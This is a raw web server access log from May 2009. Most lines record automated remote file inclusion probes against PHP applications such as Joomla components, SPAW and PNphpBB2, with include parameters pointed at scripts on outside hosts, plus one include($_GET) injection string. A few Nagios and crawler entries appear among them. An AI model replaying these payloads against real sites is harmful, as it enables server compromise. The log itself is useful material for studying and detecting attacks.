76.73.56.159 - - [30/May/2009:06:19:46 -0400] "GET /logs/access_log.Q109052100/?sourcedir=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
76.73.56.159 - - [30/May/2009:06:19:46 -0400] "GET /logs/error_log.Q109051300/?sourcedir=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
76.73.56.159 - - [30/May/2009:06:19:46 -0400] "GET /?sourcedir=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
211.203.180.144 - - [30/May/2009:06:20:10 -0400] "GET /logs/error_log.Q109010800//admin/spaw/spaw_control.class.php?spaw_root=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 258 "-" "libwww-perl/5.79"
211.203.180.144 - - [30/May/2009:06:20:10 -0400] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 232 "-" "libwww-perl/5.79"
211.203.180.144 - - [30/May/2009:06:20:10 -0400] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
211.203.180.144 - - [30/May/2009:06:20:10 -0400] "GET /logs/error_log.Q108121200//admin/spaw/spaw_control.class.php?spaw_root=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 258 "-" "libwww-perl/5.79"
76.73.56.159 - - [30/May/2009:06:20:29 -0400] "GET /logs/access_log.Q109052100%20%20/?sourcedir=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
76.73.56.159 - - [30/May/2009:06:20:29 -0400] "GET /logs/error_log.Q109051300%20%20/?sourcedir=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
76.73.56.159 - - [30/May/2009:06:20:29 -0400] "GET /?sourcedir=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
76.73.56.159 - - [30/May/2009:06:20:29 -0400] "GET /logs/?sourcedir=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 200 3428 "-" "Mozilla/5.0"
203.194.204.129 - - [30/May/2009:06:21:10 -0400] "GET /index.php?str=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
203.194.204.129 - - [30/May/2009:06:21:10 -0400] "GET /logs/index.php?str=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
209.59.12.99 - - [30/May/2009:06:21:40 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
118.98.212.6 - - [30/May/2009:06:22:13 -0400] "GET /logs/access_log.Q109051100//include.php?language=0&lang_settings[0][1]=http://phanservice.com/id.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
118.98.212.6 - - [30/May/2009:06:22:14 -0400] "GET //include.php?language=0&lang_settings[0][1]=http://phanservice.com/id.txt?? HTTP/1.1" 404 210 "-" "libwww-perl/5.79"
118.98.212.6 - - [30/May/2009:06:22:15 -0400] "GET /logs//include.php?language=0&lang_settings[0][1]=http://phanservice.com/id.txt?? HTTP/1.1" 404 215 "-" "libwww-perl/5.79"
118.98.212.6 - - [30/May/2009:06:22:41 -0400] "GET /logs/access_log.Q109051100//include.php?language=0&lang_settings[0][1]=http://phanservice.com/id.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
118.98.212.6 - - [30/May/2009:06:22:42 -0400] "GET //include.php?language=0&lang_settings[0][1]=http://phanservice.com/id.txt?? HTTP/1.1" 404 210 "-" "libwww-perl/5.79"
211.203.180.144 - - [30/May/2009:06:22:47 -0400] "GET /logs/error_log.Q108100500%20//admin/spaw/spaw_control.class.php?spaw_root=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 259 "-" "libwww-perl/5.79"
211.203.180.144 - - [30/May/2009:06:22:47 -0400] "GET /logs/error_log.Q108052100%20//admin/spaw/spaw_control.class.php?spaw_root=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 259 "-" "libwww-perl/5.79"
211.203.180.144 - - [30/May/2009:06:22:55 -0400] "GET /logs/error_log.Q108112600//faqsupport/samplefaqsupport.php?path[docroot]=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 256 "-" "libwww-perl/5.79"
211.203.180.144 - - [30/May/2009:06:22:55 -0400] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 230 "-" "libwww-perl/5.79"
211.203.180.144 - - [30/May/2009:06:22:55 -0400] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
87.106.179.130 - - [30/May/2009:06:22:57 -0400] "GET /logs/access_log.Q109010700//add.php?APB_rp=http://jsparix.nuxit.net//components/com_zoom/classes/telid.txt? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
76.73.56.159 - - [30/May/2009:06:22:57 -0400] "GET /?sourcedir=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
76.73.56.159 - - [30/May/2009:06:22:57 -0400] "GET /logs/?sourcedir=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 200 3428 "-" "Mozilla/5.0"
76.73.56.159 - - [30/May/2009:06:22:57 -0400] "GET /logs/access_log.Q109052100/?sourcedir=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
76.73.56.159 - - [30/May/2009:06:22:57 -0400] "GET /logs/error_log.Q109051300/?sourcedir=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
87.106.179.130 - - [30/May/2009:06:23:02 -0400] "GET //add.php?APB_rp=http://jsparix.nuxit.net//components/com_zoom/classes/telid.txt? HTTP/1.1" 404 206 "-" "libwww-perl/5.805"
87.106.179.130 - - [30/May/2009:06:23:02 -0400] "GET /logs//add.php?APB_rp=http://jsparix.nuxit.net//components/com_zoom/classes/telid.txt? HTTP/1.1" 404 211 "-" "libwww-perl/5.805"
201.232.54.48 - - [30/May/2009:06:23:07 -0400] "GET /config.php?path_to_root=http://oishi-x.my1.ru/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
201.232.54.48 - - [30/May/2009:06:23:07 -0400] "GET /logs/config.php?path_to_root=http://oishi-x.my1.ru/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
201.232.54.48 - - [30/May/2009:06:23:07 -0400] "GET /logs/access_log.Q109052100%20%20/config.php?path_to_root=http://oishi-x.my1.ru/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
201.232.54.48 - - [30/May/2009:06:23:57 -0400] "GET /config.php?path_to_root=http://oishi-x.my1.ru/id1.txt????? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
201.232.54.48 - - [30/May/2009:06:23:57 -0400] "GET /logs/access_log.Q109052100/config.php?path_to_root=http://oishi-x.my1.ru/id1.txt????? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
201.232.54.48 - - [30/May/2009:06:23:57 -0400] "GET /logs/config.php?path_to_root=http://oishi-x.my1.ru/id1.txt????? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
201.232.54.48 - - [30/May/2009:06:24:27 -0400] "GET /logs/access_log.Q109052100/config.php?path_to_root=http://oishi-x.my1.ru/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
74.6.8.108 - - [30/May/2009:06:24:35 -0400] "GET /robots.txt HTTP/1.0" 404 208 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.8.108 - - [30/May/2009:06:24:35 -0400] "GET /logs/error_log.Q108070900 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
125.206.170.126 - - [30/May/2009:06:24:50 -0400] "GET //index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET%5Ba%5D),exit.%2527&a=http://www.lidoestensi.com/dmdocuments/root/glup.txt? HTTP/1.0" 404 208 "-" "libwww-perl/5.50"
72.18.148.82 - - [30/May/2009:06:24:57 -0400] "GET /logs/access_log.Q109051600//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
118.98.212.6 - - [30/May/2009:06:24:59 -0400] "GET /logs/access_log.Q109051100//include.php?language=0&lang_settings[0][1]=http://phanservice.com/id.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
118.98.212.6 - - [30/May/2009:06:25:01 -0400] "GET //include.php?language=0&lang_settings[0][1]=http://phanservice.com/id.txt?? HTTP/1.1" 404 210 "-" "libwww-perl/5.79"
201.232.54.48 - - [30/May/2009:06:25:30 -0400] "GET /logs/access_log.Q109052100%20%20/config.php?path_to_root=http://oishi-x.my1.ru/id1.txt????? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
211.203.180.144 - - [30/May/2009:06:25:52 -0400] "GET /logs/error_log.Q108111900//faqsupport/samplefaqsupport.php?path[docroot]=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 256 "-" "libwww-perl/5.79"
218.249.36.194 - - [30/May/2009:06:26:36 -0400] "GET /logs/config.php?path_to_root=http://oishi-x.my1.ru/id1.txt????? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
218.249.36.194 - - [30/May/2009:06:26:36 -0400] "GET /config.php?path_to_root=http://oishi-x.my1.ru/id1.txt????? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
218.249.36.194 - - [30/May/2009:06:26:36 -0400] "GET /logs/access_log.Q109052100/config.php?path_to_root=http://oishi-x.my1.ru/id1.txt????? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.59.12.99 - - [30/May/2009:06:26:39 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.249.36.194 - - [30/May/2009:06:26:40 -0400] "GET /config.php?path_to_root=http://oishi-x.my1.ru/id1.txt????? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
218.249.36.194 - - [30/May/2009:06:26:40 -0400] "GET /logs/config.php?path_to_root=http://oishi-x.my1.ru/id1.txt????? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
218.249.36.194 - - [30/May/2009:06:26:40 -0400] "GET /logs/access_log.Q109052100/config.php?path_to_root=http://oishi-x.my1.ru/id1.txt????? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
72.18.148.82 - - [30/May/2009:06:26:50 -0400] "GET /logs/access_log.Q109052200/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
72.18.148.82 - - [30/May/2009:06:26:50 -0400] "GET /logs/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
72.18.148.82 - - [30/May/2009:06:26:50 -0400] "GET /modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
218.150.78.203 - - [30/May/2009:06:27:07 -0400] "GET /logs/access_log.Q109052100%20//index.php?option=com_magazine<emid=&mosConfig_absolute_path=http://www.triton-friendlyclub.com/2009/idosiriys.txt??? HTTP/1.1" 404 236 "-" "libwww-perl/5.79"
218.150.78.203 - - [30/May/2009:06:27:07 -0400] "GET //index.php?option=com_magazine<emid=&mosConfig_absolute_path=http://www.triton-friendlyclub.com/2009/idosiriys.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
218.150.78.203 - - [30/May/2009:06:27:14 -0400] "GET /logs//index.php?option=com_magazine<emid=&mosConfig_absolute_path=http://www.triton-friendlyclub.com/2009/idosiriys.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
72.18.148.82 - - [30/May/2009:06:28:34 -0400] "GET /logs/access_log.Q109052200%20%20/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
78.31.141.129 - - [30/May/2009:06:28:56 -0400] "GET /logs/access_log.Q109010700//add.php?APB_rp=http://jsparix.nuxit.net//components/com_zoom/classes/telid.txt? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
218.249.36.194 - - [30/May/2009:06:28:57 -0400] "GET /logs/access_log.Q109052100%20%20/config.php?path_to_root=http://oishi-x.my1.ru/id1.txt????? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
78.31.141.129 - - [30/May/2009:06:28:57 -0400] "GET //add.php?APB_rp=http://jsparix.nuxit.net//components/com_zoom/classes/telid.txt? HTTP/1.1" 404 206 "-" "libwww-perl/5.805"
78.31.141.129 - - [30/May/2009:06:29:02 -0400] "GET /logs//add.php?APB_rp=http://jsparix.nuxit.net//components/com_zoom/classes/telid.txt? HTTP/1.1" 404 211 "-" "libwww-perl/5.805"
78.31.141.129 - - [30/May/2009:06:29:18 -0400] "GET /logs/access_log.Q109010700//add.php?APB_rp=http://jsparix.nuxit.net//components/com_zoom/classes/telid.txt? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
78.31.141.129 - - [30/May/2009:06:29:19 -0400] "GET //add.php?APB_rp=http://jsparix.nuxit.net//components/com_zoom/classes/telid.txt? HTTP/1.1" 404 206 "-" "libwww-perl/5.805"
78.31.141.129 - - [30/May/2009:06:29:22 -0400] "GET /logs//add.php?APB_rp=http://jsparix.nuxit.net//components/com_zoom/classes/telid.txt? HTTP/1.1" 404 211 "-" "libwww-perl/5.805"
209.142.149.230 - - [30/May/2009:06:30:12 -0400] "GET /logs/error_log.Q108120300//add.php?APB_rp=http://jsparix.nuxit.net//components/com_zoom/classes/telid.txt? HTTP/1.1" 404 232 "-" "libwww-perl/5.803"
218.249.36.194 - - [30/May/2009:06:30:15 -0400] "GET /logs/access_log.Q109052100%20%20/config.php?path_to_root=http://oishi-x.my1.ru/id1.txt????? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
208.38.188.128 - - [30/May/2009:06:30:21 -0400] "GET /logs/access_log.Q109052200//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://clevelandpeac.org/CMS/images/id.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.810"
208.38.188.128 - - [30/May/2009:06:30:21 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://clevelandpeac.org/CMS/images/id.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.810"
208.38.188.128 - - [30/May/2009:06:30:21 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://clevelandpeac.org/CMS/images/id.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.810"
60.249.255.172 - - [30/May/2009:06:30:50 -0400] "GET /phphtml.php?htmlclass_path=http://www.szolnokmegye.hu/plugins/p2000_sponsor_manager/fx29id.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
60.249.255.172 - - [30/May/2009:06:30:51 -0400] "GET /logs/access_log.Q109052300/phphtml.php?htmlclass_path=http://www.szolnokmegye.hu/plugins/p2000_sponsor_manager/fx29id.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
216.17.99.13 - - [30/May/2009:06:30:51 -0400] "GET /logs/access_log.Q109051500%20%20/?sourcedir=http://jasek3.fileave.com/id.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
216.17.99.13 - - [30/May/2009:06:30:51 -0400] "GET /?sourcedir=http://jasek3.fileave.com/id.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
216.17.99.13 - - [30/May/2009:06:30:51 -0400] "GET /logs/?sourcedir=http://jasek3.fileave.com/id.txt?? HTTP/1.1" 200 3428 "-" "Mozilla/5.0"
118.98.212.6 - - [30/May/2009:06:30:52 -0400] "GET /logs/access_log.Q109051100//include.php?language=0&lang_settings[0][1]=http://phanservice.com/id.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
118.98.212.6 - - [30/May/2009:06:30:52 -0400] "GET //include.php?language=0&lang_settings[0][1]=http://phanservice.com/id.txt?? HTTP/1.1" 404 210 "-" "libwww-perl/5.79"
60.249.255.172 - - [30/May/2009:06:30:53 -0400] "GET /logs/phphtml.php?htmlclass_path=http://www.szolnokmegye.hu/plugins/p2000_sponsor_manager/fx29id.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
118.98.212.6 - - [30/May/2009:06:30:53 -0400] "GET /logs//include.php?language=0&lang_settings[0][1]=http://phanservice.com/id.txt?? HTTP/1.1" 404 215 "-" "libwww-perl/5.79"
118.98.212.6 - - [30/May/2009:06:31:13 -0400] "GET /logs/access_log.Q109051100//include.php?language=0&lang_settings[0][1]=http://phanservice.com/id.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
203.194.204.129 - - [30/May/2009:06:31:14 -0400] "GET //index.php?str=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
203.194.204.129 - - [30/May/2009:06:31:14 -0400] "GET /logs//index.php?str=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
118.98.212.6 - - [30/May/2009:06:31:14 -0400] "GET //include.php?language=0&lang_settings[0][1]=http://phanservice.com/id.txt?? HTTP/1.1" 404 210 "-" "libwww-perl/5.79"
118.98.212.6 - - [30/May/2009:06:31:15 -0400] "GET /logs//include.php?language=0&lang_settings[0][1]=http://phanservice.com/id.txt?? HTTP/1.1" 404 215 "-" "libwww-perl/5.79"
216.17.99.13 - - [30/May/2009:06:31:32 -0400] "GET /logs/access_log.Q109052300%20%20/?sourcedir=http://jasek3.fileave.com/id.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
209.59.12.99 - - [30/May/2009:06:31:39 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
208.38.188.128 - - [30/May/2009:06:32:27 -0400] "GET /logs/access_log.Q109051100//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://clevelandpeac.org/CMS/images/id.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.810"
24.132.148.25 - - [30/May/2009:06:32:44 -0400] "GET /logs/access_log.Q109010700//add.php?APB_rp=http://jsparix.nuxit.net//components/com_zoom/classes/telid.txt? HTTP/1.1" 404 233 "-" "libwww-perl/5.64"
24.132.148.25 - - [30/May/2009:06:32:44 -0400] "GET //add.php?APB_rp=http://jsparix.nuxit.net//components/com_zoom/classes/telid.txt? HTTP/1.1" 404 206 "-" "libwww-perl/5.64"
24.132.148.25 - - [30/May/2009:06:32:44 -0400] "GET /logs//add.php?APB_rp=http://jsparix.nuxit.net//components/com_zoom/classes/telid.txt? HTTP/1.1" 404 211 "-" "libwww-perl/5.64"
118.98.212.6 - - [30/May/2009:06:32:56 -0400] "GET /logs/access_log.Q109051100//include.php?language=0&lang_settings[0][1]=http://phanservice.com/id.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
118.98.212.6 - - [30/May/2009:06:32:57 -0400] "GET //include.php?language=0&lang_settings[0][1]=http://phanservice.com/id.txt?? HTTP/1.1" 404 210 "-" "libwww-perl/5.79"
118.98.212.6 - - [30/May/2009:06:32:58 -0400] "GET /logs//include.php?language=0&lang_settings[0][1]=http://phanservice.com/id.txt?? HTTP/1.1" 404 215 "-" "libwww-perl/5.79"
85.10.128.219 - - [30/May/2009:06:33:31 -0400] "GET /logs/access_log.Q109051000//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
85.10.128.219 - - [30/May/2009:06:33:31 -0400] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
85.10.128.219 - - [30/May/2009:06:33:31 -0400] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:06:33:41 -0400] "GET /config.php?path_to_root=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:06:33:41 -0400] "GET /logs/config.php?path_to_root=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:06:33:45 -0400] "GET /logs/access_log.Q109052100/config.php?path_to_root=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:06:33:56 -0400] "GET /config.php?path_to_root=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:06:33:56 -0400] "GET /logs/config.php?path_to_root=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:06:33:56 -0400] "GET /logs/access_log.Q109052100/config.php?path_to_root=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.150.78.203 - - [30/May/2009:06:34:04 -0400] "GET /logs/access_log.Q109052100//index.php?option=com_magazine<emid=&mosConfig_absolute_path=http://www.triton-friendlyclub.com/2009/idosiriys.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
85.17.162.28 - - [30/May/2009:06:34:08 -0400] "GET /config.php?path_to_root=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:06:34:08 -0400] "GET /logs/config.php?path_to_root=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:06:34:08 -0400] "GET /logs/access_log.Q109052100/config.php?path_to_root=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
201.232.54.48 - - [30/May/2009:06:34:12 -0400] "GET /logs//main.php?sayfa=http://oishi-x.my1.ru/id1.txt????? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
201.232.54.48 - - [30/May/2009:06:34:12 -0400] "GET /logs/access_log.Q109051000%20%20//main.php?sayfa=http://oishi-x.my1.ru/id1.txt????? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
201.232.54.48 - - [30/May/2009:06:34:12 -0400] "GET /logs/access_log.Q109051800%20%20//main.php?sayfa=http://oishi-x.my1.ru/id1.txt????? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
201.232.54.48 - - [30/May/2009:06:34:12 -0400] "GET //main.php?sayfa=http://oishi-x.my1.ru/id1.txt????? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
201.232.54.48 - - [30/May/2009:06:34:15 -0400] "GET //main.php?sayfa=http://oishi-x.my1.ru/id1.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
201.232.54.48 - - [30/May/2009:06:34:15 -0400] "GET /logs/access_log.Q109051800//main.php?sayfa=http://oishi-x.my1.ru/id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
201.232.54.48 - - [30/May/2009:06:34:15 -0400] "GET /logs/access_log.Q109051000//main.php?sayfa=http://oishi-x.my1.ru/id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
201.232.54.48 - - [30/May/2009:06:34:15 -0400] "GET /logs//main.php?sayfa=http://oishi-x.my1.ru/id1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
218.150.78.203 - - [30/May/2009:06:34:17 -0400] "GET /logs/access_log.Q109050700//index.php?option=com_magazine<emid=&mosConfig_absolute_path=http://www.triton-friendlyclub.com/2009/idosiriys.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
201.232.54.48 - - [30/May/2009:06:34:22 -0400] "GET /logs//main.php?sayfa=http://oishi-x.my1.ru/id1.txt????? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
201.232.54.48 - - [30/May/2009:06:34:22 -0400] "GET //main.php?sayfa=http://oishi-x.my1.ru/id1.txt????? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
201.232.54.48 - - [30/May/2009:06:34:25 -0400] "GET /logs/access_log.Q109051800%20%20//main.php?sayfa=http://oishi-x.my1.ru/id1.txt????? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
201.232.54.48 - - [30/May/2009:06:34:25 -0400] "GET /logs/access_log.Q109051000%20%20//main.php?sayfa=http://oishi-x.my1.ru/id1.txt????? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
118.98.212.6 - - [30/May/2009:06:34:42 -0400] "GET /logs/access_log.Q109051100//include.php?language=0&lang_settings[0][1]=http://phanservice.com/id.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
118.98.212.6 - - [30/May/2009:06:34:43 -0400] "GET //include.php?language=0&lang_settings[0][1]=http://phanservice.com/id.txt?? HTTP/1.1" 404 210 "-" "libwww-perl/5.79"
118.98.212.6 - - [30/May/2009:06:34:44 -0400] "GET /logs//include.php?language=0&lang_settings[0][1]=http://phanservice.com/id.txt?? HTTP/1.1" 404 215 "-" "libwww-perl/5.79"
218.249.36.194 - - [30/May/2009:06:34:46 -0400] "GET //main.php?sayfa=http://oishi-x.my1.ru/id1.txt????? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
218.249.36.194 - - [30/May/2009:06:34:46 -0400] "GET /logs//main.php?sayfa=http://oishi-x.my1.ru/id1.txt????? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
218.249.36.194 - - [30/May/2009:06:34:46 -0400] "GET /logs/access_log.Q109051800//main.php?sayfa=http://oishi-x.my1.ru/id1.txt????? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
218.249.36.194 - - [30/May/2009:06:34:46 -0400] "GET /logs/access_log.Q109051000//main.php?sayfa=http://oishi-x.my1.ru/id1.txt????? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
203.194.204.129 - - [30/May/2009:06:34:47 -0400] "GET /logs//index.php?str=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
203.194.204.129 - - [30/May/2009:06:34:47 -0400] "GET //index.php?str=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
218.249.36.194 - - [30/May/2009:06:34:54 -0400] "GET //main.php?sayfa=http://oishi-x.my1.ru/id1.txt????? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
218.249.36.194 - - [30/May/2009:06:34:54 -0400] "GET /logs//main.php?sayfa=http://oishi-x.my1.ru/id1.txt????? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
218.249.36.194 - - [30/May/2009:06:34:54 -0400] "GET /logs/access_log.Q109051800//main.php?sayfa=http://oishi-x.my1.ru/id1.txt????? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
218.249.36.194 - - [30/May/2009:06:34:54 -0400] "GET /logs/access_log.Q109051000//main.php?sayfa=http://oishi-x.my1.ru/id1.txt????? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
194.126.110.134 - - [30/May/2009:06:34:58 -0400] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
194.126.110.134 - - [30/May/2009:06:34:58 -0400] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
194.126.110.134 - - [30/May/2009:06:34:58 -0400] "GET /logs/access_log.Q109051000//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
201.232.54.48 - - [30/May/2009:06:35:13 -0400] "GET /logs/access_log.Q109051000%20%20//main.php?sayfa=http://oishi-x.my1.ru/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
201.232.54.48 - - [30/May/2009:06:35:13 -0400] "GET /logs/access_log.Q109051800%20%20//main.php?sayfa=http://oishi-x.my1.ru/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
85.10.128.219 - - [30/May/2009:06:35:20 -0400] "GET /logs/access_log.Q109051000%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
